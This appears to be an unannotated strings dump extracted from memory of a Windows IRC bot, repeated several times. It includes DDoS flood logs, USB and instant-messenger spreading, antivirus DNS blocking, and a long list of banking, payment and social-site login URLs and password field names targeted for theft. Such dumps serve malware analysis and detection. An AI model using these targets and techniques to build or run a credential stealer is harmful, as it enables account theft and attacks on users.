[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\e621ca05

%System%\svchost.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe

c:\%original file name%.exe

svchost.exe_1104_rwx_033C0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0=

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\e621ca05

%WinDir%\System32\svchost.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe

c:\%original file name%.exe

svchost.exe_1164_rwx_00870000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\e621ca05

%System%\svchost.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe

c:\%original file name%.exe

svchost.exe_1244_rwx_00C80000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\e621ca05

%System%\svchost.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe

c:\%original file name%.exe

wmiprvse.exe_1352_rwx_00DE0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

